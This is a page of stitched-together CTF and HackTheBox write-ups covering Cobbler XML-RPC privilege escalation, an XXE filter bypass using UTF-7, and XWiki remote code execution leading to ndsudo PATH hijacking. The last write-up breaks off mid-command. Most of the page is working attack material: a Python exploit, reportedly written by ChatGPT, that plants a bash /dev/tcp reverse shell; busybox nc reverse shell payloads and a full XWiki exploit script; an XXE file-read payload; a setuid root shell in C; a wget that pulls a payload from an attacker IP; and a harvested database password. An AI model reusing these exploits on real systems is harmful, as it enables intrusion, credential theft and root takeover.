mysql       1287       1  0 07:21 ?        00:00:09 /usr/sbin/mariadbd
root        1288       1  0 07:21 ?        00:00:03 /usr/sbin/apache2 -k start
www-data   97625    1288  0 13:35 ?        00:00:00 /usr/sbin/apache2 -k start
root       98060       2  0 13:38 ?        00:00:00 [kworker/u4:0-events_unbound]
www-data  104468   97625  0 14:02 ?        00:00:00 sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.12.11",4444));os.dup2
www-data  104470  104469  0 14:02 ?        00:00:00 sh
root      104556       2  0 14:03 ?        00:00:01 [kworker/1:2-events]
root      105772       2  0 14:08 ?        00:00:00 [kworker/u4:3-ext4-rsv-conversion]
root      108690       2  0 14:19 ?        00:00:00 [kworker/0:3-events]
www-data  108801    1288  0 14:19 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  109302    1288  0 14:20 ?        00:00:00 /usr/sbin/apache2 -k start
root      109303       1  0 14:20 ?        00:00:00 sshd: cobble [priv]
cobble    109394       1  0 14:21 ?        00:00:00 /lib/systemd/systemd --user
cobble    109395  109394  0 14:21 ?        00:00:00 (sd-pam)
cobble    109414  109303  0 14:21 ?        00:00:00 sshd: cobble@pts/1
cobble    109489  109414  0 14:21 ?        00:00:00 -rbash
root      109804       2  0 14:23 ?        00:00:00 [kworker/1:3-events]
www-data  111008    1288  0 14:27 ?        00:00:00 /usr/sbin/apache2 -k start
...

cobble@cobblestone:~$ ss -lntp
State                 Recv-Q                Send-Q                               Local Address:Port                                 Peer Address:Port                Process
LISTEN                0                     5                                        127.0.0.1:25151                                     0.0.0.0:*
LISTEN                0                     511                                        0.0.0.0:80                                        0.0.0.0:*
LISTEN                0                     128                                        0.0.0.0:22                                        0.0.0.0:*
LISTEN                0                     80                                       127.0.0.1:3306                                      0.0.0.0:*
LISTEN                0                     128                                           [::]:22                                           [::]:*

cobble@cobblestone:~$ ss -lnup
State                 Recv-Q                Send-Q                               Local Address:Port                                 Peer Address:Port                Process
UNCONN                0                     0                                          0.0.0.0:68                                        0.0.0.0:*
UNCONN                0                     0                                          0.0.0.0:69                                        0.0.0.0:*
UNCONN                0                     0                                             [::]:69                                           [::]:*

<h1>Observations:</h1>

The process /usr/local/bin/cobblerd -F is running as root and listening exclusively on 127.0.0.1:25151. Apache, PHP-FPM, and MariaDB are all active, with MariaDB bound to localhost. A TFTP server is running on UDP port 69 at /srv/tftp. This setup represents a typical Cobbler stack—allowing exploitation of Cobbler’s XML-RPC interface from localhost to read arbitrary files with root privileges. A provisioning daemon operating as root and exposing a local API effectively functions as an on-demand privilege escalation vector.

<h1>Cobbler</h1>

Understanding Cobbler’s operation might call for basic familiarity with Linux kernel internals. However, an in-depth exploration—such as the kernel boot process involving initrd (previously initramfs) or filesystem management—is outside this write-up’s scope. Moreover, such detail isn’t required to exploit this challenge. For comprehensive insights, refer to the official Linux Kernel documentation.

<h1>Fundamental Concepts</h1> <h2>Cobbler</h2>

:::tip

Cobbler is a Linux provisioning and PXE (Preboot Execution Environment) server designed to automate OS installations. It manages three primary object types:

Distro: Metadata for an OS build, primarily including paths to the kernel and initrd files on the Cobbler host (e.g., /boot/vmlinuz-6.1.0-37-amd64, /boot/initrd.img-6.1.0-37-amd64).
Profile: An installation blueprint that references one distro and includes configuration details such as kickstart templates.
System: A specific machine configuration pointing to a profile, with host-specific adjustments like MAC/IP addresses and templated files.

The Cobbler daemon (cobblerd) operates as root and exposes a management API bound to 127.0.0.1:25151.

<h2>Provisioning</h2>

Provisioning is the process of setting up systems or users with the necessary resources and services. This includes creating, modifying, or deleting user accounts and profiles, managing permissions, and configuring IT infrastructure. It ensures users have appropriate access to perform their roles efficiently.

TFTP (Trivial File Transfer Protocol, UDP port 69) facilitates PXE boot by delivering bootloaders, kernels, and initrd images to clients.

:::

From the process list:

in.tftpd --secure /srv/tftp

This indicates the server delivers files from /srv/tftp. The --secure flag restricts access to that directory, enforcing read-only permissions—a vital part of PXE booting but not directly exploitable for privilege escalation here unless the directory is writable.

Cobbler acts as an orchestrator for PXE and OS provisioning. It maintains an internal representation of expected resources—distros, profiles, and systems—and materializes these into files and directories served via TFTP/HTTP. The XML-RPC API serves as a remote interface to this model, accessible locally at 127.0.0.1:25151, used by both the Cobbler CLI and web interface.

Through this API, an authenticated user can create, modify, and save distros, profiles, and systems, then trigger a sync operation.

The sync function is Cobbler’s "deploy changes" command. When invoked via srv.sync(token):

Cobbler reads its internal database/state for all distros, profiles, and systems.
It validates that referenced kernel/initrd paths exist on disk.
It generates or updates files within managed directories, typically:

TFTP tree (e.g., /srv/tftp)

Web tree (e.g., /srv/www/cobbler or /var/www/cobbler)
Internal template/cache directories under /var/lib/cobbler/...
It processes per-system template_files, copying or rendering them into system-specific areas for serving or querying.

Since cobblerd runs with root privileges, all file operations happen with full system rights—this is a critical factor.

Notably, a System object’s template_files can be defined as:

{"<source_path_on_host>": "<virtual_dest_path>"}

<source_path_on_host> can be any path on the Cobbler server (e.g., /etc/shadow).
<virtual_dest_path> is a logical identifier (e.g., /leak) that Cobbler uses as a reference.

When sync runs, Cobbler opens the source file as root, reads its contents, and stores it in the system’s template repository under the virtual destination.

Later, the XML-RPC method

lets ask chatgpt to write exploit script:

import xmlrpc.client
import uuid

TARGET = "http://127.0.0.1:25151"
LHOST, LPORT = "10.10.xx.xx", "4444"

# Expression-only Cheetah payload that won't break parsing:
payload = f"""#set $null = __import__('os').system('bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"')
# Kickstart minimal skeleton (keeps Cobbler happy)
lang en_US
keyboard us
network --bootproto=dhcp
rootpw  --plaintext cobbler
timezone UTC
bootloader --location=mbr
clearpart --all --initlabel
autopart
reboot
"""

random_suffix = str(uuid.uuid4())[:4]

s = xmlrpc.client.ServerProxy(TARGET)
t = s.login("", -1)  # CVE-2024-47533

# (Re)write the malicious template (avoid #python/#end python)
s.write_autoinstall_template("pwn.ks", payload, t)

did = s.new_distro(t)
s.modify_distro(did, "name", f"pwn_distro{random_suffix}", t)
s.modify_distro(did, "arch", "x86_64", t)
s.modify_distro(did, "breed", "redhat", t)
s.modify_distro(did, "kernel", "vmlinuz", t)
s.modify_distro(did, "initrd", "initrd.img", t)
s.save_distro(did, t)

# Create/adjust the profile, link distro, set our template
try:
    pid = s.new_profile(t)
    s.modify_profile(pid, "name", "pwnprof", t)
except xmlrpc.client.Fault:
    pid = s.get_profile("pwnprof", t)

s.modify_profile(pid, "distro", f"pwn_distro{random_suffix}", t)
s.modify_profile(pid, "autoinstall", "pwn.ks", t)
s.modify_profile(pid, "kickstart",   "pwn.ks", t)
s.save_profile(pid, t)

# Render (no token arg)
print(s.generate_profile_autoinstall("pwnprof"))


root@cobblestone:/root# cat root.txt
cat root.txt
5760b52bf3b4289cf312xxxxxxxxx
root@cobblestone:/root#

</div>

Mater Flag

Sat, 09 Aug 2025 00:00:00 GMT

Ip

http://<username>.playat.flagyard.com

Here we have a simple UI which kinda works

However it wont work with any other inputs other than numbers

Lets Observe the challenge code

:::Tip

Lets BreakDown Step by step

Vulnerable code (excerpt)

parser = etree.XMLParser(resolve_entities=True)
doc = etree.fromstring(xml_data, parser)
# crude filter:
if b"<!DOCTYPE" in xml_data or b"+ADwAIQ-ENTITY" in xml_data:
    return "I'm watching you *-*"

resolve_entities=True enables entity resolution. The filter checks only for the exact bytes <!DOCTYPE and a single encoded string — it is insufficient.

Proof of Concept (PoC) Goal: Read /app/flag.txt and have the content reflected in the XML response.

Why this works: lxml will expand declared entities when resolve_entities=True. The app reflects the <weight> / <height> values in the response XML, so injecting &xxe; into <weight> will cause the file content to appear in the returned XML.

:::

Example payload (bypass simple filter) Note: The filter checks for the exact bytes <!DOCTYPE, so using case variation like <!Doctype> or adding whitespace/line breaks will evade it.

<!--?xml version="1.0" ?--->
<!DOCTYPE	 foo [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>

It seems that there is something preventing our attack. Looking at the source code

we can try to encode our payload to UTF-7 on cyberchef and then try to send it.

used payload after encoding

<?xml version="1.0" encoding="UTF-7"?>+ADw-+ACE-DOCTYPE+ACA-replace+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-ent+ACA-SYSTEM+ACA-+ACI-file:///app/flag.txt+ACI-+AD4-+ACA-+AF0-+AD4-+AA0-+AAo-+ADw-data+AD4-+ADw-weight+AD4-+ACY-ent+ADs-+ADw-/weight+AD4-+ADw-height+AD4-156+ADw-/height+AD4-+ADw-/data+AD4-

we got a flag

FlagY{c064bc53c601d52499ef381f5b5caabd}

challenge complete

Editor HTB Writeup (Protected)

Sun, 03 Aug 2025 00:00:00 GMT

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

if (!passInput) {
  document.getElementById("error").textContent = "❌ Please enter a password";
  return;
}

try {
  const response = await fetch("https://passowrd-backend-production.up.railway.app/api/unlock", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ password: passInput, postId: "era" })
  });

  const res = await response.json();
  console.log(res);

  if (res.success) {
    document.getElementById("protected-content").style.display = "block";
    document.getElementById("locked").style.display = "none";
    document.getElementById("error").textContent = "";
  } else {
    document.getElementById("error").textContent = "❌ Wrong password";
  }
} catch (error) {
  console.error("Error during unlock:", error);
  document.getElementById("error").textContent = "❌ Server error, try again later";
}

} </script>

IP

10.10.xx.xx

Recon

$ nmap -sC -sV 10.10.xx.xx
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 07:16 EDT
Stats: 0:02:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 07:18 (0:00:00 remaining)
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 07:18 (0:00:00 remaining)
Nmap scan report for editor.htb (10.10.xx.xx)
Host is up (0.31s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Editor - SimplistCode Pro
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http    Jetty 10.0.20
| http-title: XWiki - Main - Intro
|_Requested resource was http://editor.htb:8080/xwiki/bin/view/Main/
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan: 
|   Server Type: Jetty(10.0.20)
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_http-server-header: Jetty(10.0.20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 282.67 seconds

<p>We got hostname</p>

Host

editor.htb

Website Enumeartion

check the Website : http://editor.htb/

Nothing Intrest just Download a Editor

<p style="font-weight: bold; font-size: 1.1rem; margin-bottom: 12px; color: #fff;"><strong>This writeup is password protected 🔒</strong></p> <input style="width: 100%; padding: 8px 10px; font-size: 1rem; border: 1px solid rgba(255, 255, 255, 0.6); border-radius: 6px; box-sizing: border-box; margin-bottom: 10px; background: rgba(255,255,255,0.3); color: #0d1a36;" id="pass-input" type="password" placeholder="Enter password" /> <button style="width: 100%; background-color: rgba(0, 123, 255, 0.7); color: #e0eaff; border: none; padding: 10px; font-size: 1rem; border-radius: 6px; cursor: pointer; backdrop-filter: none;" onclick="verifyHash()">Unlock</button> <p id="error" style="color: #b00020; margin-top: 8px; font-size: 0.9rem;"></p> </div>

But when you scoll down you see website Documentation

When you click on that it was redirecting to another subdomain called wiki.editor.htb

<p>We have Hostname and Subdomain</p>

Hosts/Domain

editor.htb wiki.editor.htb

<h1> Perform a Directory Scan</h1>

http://editor.htb


$ feroxbuster -u http://editor.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js,json,txt,log -t 50 -e
                                                                                                                    
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://editor.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, js, json, txt, log]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l      477w    16052c http://editor.htb/assets/index-DzxC4GL5.css
200      GET      147l     5460w   190349c http://editor.htb/assets/index-VRKEJlit.js
200      GET       15l       55w      631c http://editor.htb/
403      GET        7l       10w      162c http://editor.htb/assets/
301      GET        7l       12w      178c http://editor.htb/assets => http://editor.htb/assets/
200      GET       15l       55w      631c http://editor.htb/index.html
[#############] - 6m     420028/420028  25m     found:6       errors:58     
[#############] - 6m      420028/420028  97/s    http://editor.htb/ 
[#############] - 6s     210000/210000  105/s   http://editor.htb/assets/

http://wiki.editor.htb


$ feroxbuster -u http://wiki.editor.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js,json,txt,log -t 50 -e

                                                                                                                                                                                               
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://wiki.editor.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, js, json, txt, log]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/save => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01aaxsstkyeryl1rgl127usu0pi12837.node0?srid=rihRLMqW&xredirect=%2Fxwiki%2Fbin%2Fsave%3Fsrid%3DrihRLMqW
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/rollback => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node019214ftu1ojswnwb3eueg7f7012839.node0?srid=1rsIaY1w&xredirect=%2Fxwiki%2Fbin%2Frollback%3Fsrid%3D1rsIaY1w
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/propupdate => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01nqjrinul421u6jzhzvosokhq12840.node0?srid=PhLNBe7H&xredirect=%2Fxwiki%2Fbin%2Fpropupdate%3Fsrid%3DPhLNBe7H
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/upload => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node014kehnsptsuvb1lf1rmz4n66d12842.node0?srid=piEjk52V&xredirect=%2Fxwiki%2Fbin%2Fupload%3Fsrid%3DpiEjk52V
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/lock => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node059kj9d2709utetgw4xeiujco12846.node0?srid=pnQn583O&xredirect=%2Fxwiki%2Fbin%2Flock%3Fsrid%3DpnQn583O
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/delattachment => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01nyo9l2g0dsazhin0uizvxb9112845.node0?srid=TVgBU7j7&xredirect=%2Fxwiki%2Fbin%2Fdelattachment%3Fsrid%3DTVgBU7j7
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/propdisable => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node010dxiqwzgqqps5mpdvbiiuw1m12849.node0?srid=iMk4eQRp&xredirect=%2Fxwiki%2Fbin%2Fpropdisable%3Fsrid%3DiMk4eQRp
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/preview => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01omjlephzjito18xqqroq7bs4q12851.node0?srid=DL0UWmO4&xredirect=%2Fxwiki%2Fbin%2Fpreview%3Fsrid%3DDL0UWmO4
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/deleteversions => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01d052ovcfrhxrqmsjbc8lolf212832.node0?srid=VeccwXlq&xredirect=%2Fxwiki%2Fbin%2Fdeleteversions%3Fsrid%3DVeccwXlq
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/admin => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0sz5dgu2820ed9cdq6erczk5l12854.node0?srid=JifiQBBk&xredirect=%2Fxwiki%2Fbin%2Fadmin%3Fsrid%3DJifiQBBk
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/reset => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0c7okrmlz682dq7v0tk01kwe12831.node0?srid=Nko0FxVz&xredirect=%2Fxwiki%2Fbin%2Freset%3Fsrid%3DNko0FxVz
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/import => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01bw7tomqqckqwnyeckm2h16vo12841.node0?srid=R5xSPlkG&xredirect=%2Fxwiki%2Fbin%2Fimport%3Fsrid%3DR5xSPlkG
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/commentsave => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0104ssgce6nshfeacusn8lp2un12850.node0?srid=72dkeZoO&xredirect=%2Fxwiki%2Fbin%2Fcommentsave%3Fsrid%3D72dkeZoO
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/inline => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01l70bnwdsp7dj1xnz6hengzhm012861.node0?srid=raELcIN5&xredirect=%2Fxwiki%2Fbin%2Finline%3Fsrid%3DraELcIN5
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/propdelete => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01tm4jab940gw61e32wbjptq5io12864.node0?srid=1HZ45XTA&xredirect=%2Fxwiki%2Fbin%2Fpropdelete%3Fsrid%3D1HZ45XTA                                                                                                                 
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/edit => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node03lres7v4dtzngp4nhbh611nf12862.node0?srid=PaTOM5c1&xredirect=%2Fxwiki%2Fbin%2Fedit%3Fsrid%3DPaTOM5c1                                                                                                                               
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/ => http://wiki.editor.htb/xwiki/bin/view/Main/
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/undelete => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node02xz07hct4gi81ri8vv72w9kzu12869.node0?srid=JtytxM0D&xredirect=%2Fxwiki%2Fbin%2Fundelete%3Fsrid%3DJtytxM0D                                                                                                                      
302      GET        0l        0w        0c http://wiki.editor.htb/xwiki/bin/propenable => http://wiki.editor.htb/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0ssor4lbxmb23yo0snm2m31ls12873

[#>-----------] - 26m     420028/420028  25m     found:6       errors:58     
[#####>-------] - 26m      420028/420028  97/s    http://wiki.editor.htb/ 
[####>--------] - 26s     210000/210000  105/s   http://wiki.editor.htb/xwiki/bin/

:::CAUTION Nothing Useful Found During Directory Scan 😒 :::

<h1>Xwiki</h1>

Lets Check What We Have On Port 8080

http://editor.htb:8080/

XWiki Debian 15.10.8 is runnig
Which Version is Vulnerable

<h1>XWiki RCE</h1>

After Many Explores Found An CVE-2024-31982

Vulnerable Versions

The following versions of org.xwiki.platform:xwiki-platform-search-ui are impacted:

From 2.4-milestone-1 up to but excluding 14.10.20
From 15.0-rc-1 up to but excluding 15.5.4
From 15.6-rc-1 up to but excluding 15.10-гс-1

Fixed Releases The issue has been resolved in the following versions:

14.10.20
15.5.4
15.10-гс-1

:::Note While the vulnerability exists in these versions, the publicly known exploit does not function in our specific environment without modifications. Certain elements must be adapted to achieve successful exploitation. :::

🔍 Primary Differences Between the Two Scripts

Category	Initial PoC Script	Updated BusyBox Reverse Shell Script
Function	Runs any given command and shows its result	Establishes a reverse shell to connect back to the attacker
Workflow	Takes input URL (-u) and command (-c), injects script, and retrieves output	Identifies HTTP/HTTPS automatically, pushes preset reverse shell to /bin/sh using busybox
Script Payload	Flexible Groovy code that captures command results	Static Groovy snippet launching a BusyBox shell without expecting output
Target URL Path	`/bin/get/Main/DatabaseSearch?...`	`/bin/get/Main/SolrSearch?...`
Result Handling	Displays response <description> from server	No parsing/display – depends on callback to attacker
User Configuration	Command-line flags for interaction (-u, -c)	Hardcoded IP, port, and endpoint inside the script
Objective	For interactive command result testing	Designed for one-time remote shell access

<h1>Fixed Exploit SHELL</h1>

<h1>Method 1 (manual)</h1>

go to http://wiki.editor.htb/xwiki/bin/view/Main/SolrSearch

insert this paylaod

# payload
}}}{{async async=false}}{{groovy}}println("busybox nc 10.10.10.10 5555 -e /bin/sh".execute().text){{/groovy}}{{/async

You Got A Shell

Run script /dev/null -c bash For Stabilize

<h1>Method 2 (auto)</h1>

 # exploit.py

import requests
from html import unescape

def detect_protocol(domain):
    """Try to connect via HTTPS first, fallback to HTTP if unavailable."""
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"
    try:
        response = requests.get(https_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] HTTPS available: {https_url}")
            return https_url
    except:
        print("[!] HTTPS not available. Falling back to HTTP.")

    try:
        response = requests.get(http_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] HTTP available: {http_url}")
            return http_url
    except:
        print("[✖] Unable to reach target.")
        exit(1)

def send_direct_revshell(target_url, lhost, lport):
    """Send reverse shell payload using Groovy RCE with BusyBox."""
    print(f"[+] Sending direct reverse shell via busybox to {lhost}:{lport} ...")
    cmd = f"busybox nc {lhost} {lport} -e /bin/sh"
    encoded_cmd = cmd.replace('"', '\\"')

    payload_url = (
        f"{target_url}/bin/get/Main/SolrSearch?media=rss&text="
        f"%7D%7D%7D%7B%7Basync%20async=false%7D%7D"
        f"%7B%7Bgroovy%7D%7D\\\"{encoded_cmd}\\\""
        f".execute()%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D"
    )

    try:
        requests.get(payload_url, timeout=5)
    except requests.exceptions.RequestException:
        pass  # Ignore errors; reverse shell may be triggered

if __name__ == "__main__":
    print("=" * 80)
    print("XWiki CVE-2025-24893 - Direct Reverse Shell via BusyBox")
    print("=" * 80)

    target = "editor.htb:8080/xwiki"
    lhost = "10.10.16.xx"  # <-- Replace with your actual listener IP
    lport = "4444"

    target_url = detect_protocol(target)
    send_direct_revshell(target_url, lhost, lport)
    print("[✔] Payload sent. Check your listener (nc -lvnp 4444).")

:::note some times method 2 will now work proprly i recommend method1 :::

Now Lits Check Users

xwiki@editor:/usr/lib/xwiki-jetty$ cd /home
cd /home
xwiki@editor:/home$ ls
ls
oliver
xwiki@editor:/home$

User is oliver

Before Grab That User Flag Lets See What is hibernate.cfg.xml in XWiki

:::tip <h1>What is hibernate.cfg.xml in XWiki?</h1> <h1>Hibernate Configuration File</h1> This file belongs to Hibernate, a Java framework used for ORM (Object-Relational Mapping). In the context of XWiki, it is a core configuration file that defines how XWiki connects to its backend database. configuration file that defines how XWiki connects to its backend database.

It typically includes settings such as:

Database type and connection URL
Database username and password
Driver class
SQL dialect
Connection pool settings :::

Grabing Database Credentials from hibernate.cfg.xml

xwiki@editor:/home$ cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
<lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
xwiki@editor:/home$

We got the password of user oliver

oliver : theEd1t0rTeam99

ssh oliver@editor.htb


$ ssh oliver@editor.htb
The authenticity of host 'editor.htb (10.10.11.80)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:53: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editor.htb' (ED25519) to the list of known hosts.
oliver@editor.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Wed Jul  2 10:09:35 AM UTC 2025

  System load:  0.34               Processes:             174
  Usage of /:   38.3% of 13.68GB   Users logged in:       1
  Memory usage: 22%                IPv4 address for eth0: 10.10.11.80
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 3 13:37:46 2025 from 10.10.16.53
oliver@editor:~$ ls
exploit.c  fakebin  linpeas.sh  nvme  user.txt
oliver@editor:~$ cat user.txt
ec58c231931342*****************
oliver@editor:~$

<h1>Privesc</h1>

<h2>Enumerate SUID Binaries</h2>

find / -perm -4000 -type f 2>/dev/null

oliver@editor:~$ find / -perm -4000 -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
oliver@editor:~$

<h1>Inspect the ndsudo Binary Permissions</h1>

<h1>Plain</h1>

SUID (Set User ID) means that when a file (usually a binary) is executed, it runs with the permissions of the file owner—not the user running it.

If the file is owned by root, then any user executing it will run it with root privileges.

In this context, only users in the netdata group are allowed to run the file (enforced by group permissions or ACLs).

This is often used in monitoring setups to allow restricted users to run diagnostic tools with elevated privileges.

:::CAUTION

After Some Explores I Found some infos at https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

:::

Create this c Payload on your System

// 4o1.c
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-i", (char *)NULL);
    return 0;
}

<h1>Compile</h1>

gcc 4o1.c -o 4o1

<h1>Injecting Malicious Binary via PATH Manipulation</h1>


$ oliver@editor:~$ mkdir -p ~/fakebin && wget -q http://10.10.16.53/4o1 -O ~/fakebin/4o1 &&
